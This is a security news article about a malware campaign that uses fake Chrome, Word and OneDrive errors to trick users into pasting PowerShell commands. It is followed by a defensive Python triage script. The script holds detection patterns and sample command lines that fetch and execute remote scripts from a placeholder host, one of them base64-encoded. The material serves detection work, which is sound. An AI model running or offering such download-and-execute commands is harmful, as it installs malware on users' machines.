Threat actors keep switching methods to distribute malicious files and trick users into downloading malware. One such campaign was found using fake Google Chrome, Microsoft Word, and OneDrive errors to trick users.
The new campaign was observed being used by multiple threat actors, some of which are known for operating spam-distribution campaigns that send large volumes of email, a report from Bleeping Computer said.
The campaign uses error messages that are delivered to unsuspecting users through emails, as well as through website overlays. These messages trick users into downloading fake browser updates, which are then used to install malware onto the user’s device.
Researchers observed three attack chains being used to spread the malware: fake Google Chrome warnings displayed when a user visits a compromised website, fake website overlays, and fake error reports shared via email.
In the first case, users are met with a warning saying there is a problem displaying the webpage. The warning prompts the user to install a “root certificate” by copying a PowerShell script into the Windows clipboard and running it in a Windows console with administrator privileges. The script displays decoy messages while it downloads and installs an info-stealer onto the device.
The second method also uses compromised websites. In this case, however, attackers were found using overlays that imitate Google Chrome error messages.
In the third method, attackers send an email that mimics a Microsoft Word document prompt and asks users to download what looks like a “Word Online” extension to view the document correctly. The error message also offers “How to fix” and “Auto-fix” options. These contain commands that, attackers claim, can be copied to the clipboard and pasted into PowerShell to resolve the error. As in the other chains, the pasted command is used to download malware onto the device, compromising the user’s security.
While the campaign depends on a lack of user awareness to deliver the malware, the inability of Windows to detect and block the malicious actions has further exacerbated the problem.
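All three chains end the same way: the victim pastes a PowerShell command into a console, and that command fetches and runs a payload. From a defender's side, the common thread is therefore visible in process-creation telemetry. The following is an added example (not code from the article, from Bleeping Computer, or from the researchers it cites) that triages PowerShell command lines for the traits such "paste this to fix the error" lures tend to combine: a hidden window, an execution-policy bypass, a base64 `-EncodedCommand` payload (which the script decodes from UTF-16LE and rescans), a download cradle, `Invoke-Expression`, and reading the clipboard straight into execution. The indicator list, the weights, the threshold and the sample log lines are all assumptions constructed for the demonstration; `example.invalid` is a placeholder host.

```python
import base64
import binascii
import re

# Command-line traits to look for. This list is an assumption chosen for the example,
# not a set of indicators published with the article.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)?\s+bypass\b", re.I),
    # Capture group 1 is the base64 blob so it can be decoded and rescanned.
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "clipboard_exec": re.compile(r"\bget-clipboard\b", re.I),
}

# Weights are a judgement call: download-and-execute traits count more than mere
# quieting flags. A total at or above the threshold is flagged for analyst review.
WEIGHTS = {"hidden_window": 1, "policy_bypass": 1, "encoded_command": 2,
           "download_cradle": 2, "invoke_expression": 2, "clipboard_exec": 2}
SUSPICIOUS_THRESHOLD = 3

# Constructed sample command lines, as a process-creation log would record them.
# The encoded one is built here so the base64 is guaranteed to decode to known text.
ENCODED_PAYLOAD = base64.b64encode(
    "Invoke-WebRequest http://example.invalid/a.ps1 | Invoke-Expression".encode("utf-16le")
).decode("ascii")
SAMPLE_COMMAND_LINES = [
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden '
    '-Command "iwr http://example.invalid/fix.ps1 | iex"',
    "powershell.exe -NoProfile -EncodedCommand " + ENCODED_PAYLOAD,
    'powershell.exe -Command "Get-Clipboard | iex"',
    'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Users"',
    "cmd.exe /c dir",
]


def decode_encoded_command(cmd):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE),
    or '' when there is none or the blob is not valid base64."""
    match = INDICATORS["encoded_command"].search(cmd)
    if not match:
        return ""
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except (binascii.Error, ValueError):
        return ""
    return raw.decode("utf-16le", errors="replace")


def scan_text(text, prefix=""):
    """Return the names of all indicators that match, in INDICATORS order."""
    return [prefix + name for name, rx in INDICATORS.items() if rx.search(text)]


def analyse_command_line(cmd):
    """Score one command line; indicators found inside a decoded payload are
    reported with a 'decoded:' prefix so the analyst can see where they came from."""
    hits = scan_text(cmd)
    decoded = decode_encoded_command(cmd)
    if decoded:
        hits += scan_text(decoded, prefix="decoded:")
    score = sum(WEIGHTS[h.split(":")[-1]] for h in hits)
    return {"command": cmd, "decoded": decoded, "indicators": hits,
            "score": score, "suspicious": score >= SUSPICIOUS_THRESHOLD}


def triage(lines):
    """Run the analysis over a batch of command lines."""
    return [analyse_command_line(line) for line in lines]


if __name__ == "__main__":
    for result in triage(SAMPLE_COMMAND_LINES):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} score={result['score']} {result['indicators']} :: {result['command'][:60]}")
```

The point of rescanning the decoded `-EncodedCommand` text is that an encoded blob on its own scores only 2; it is the download cradle and `Invoke-Expression` hidden inside it that push the line over the threshold, which is exactly what a rule that only looks at the raw command line would miss. The benign `Get-ChildItem` line shows that `-NoProfile` and `-Command` by themselves are not treated as evidence.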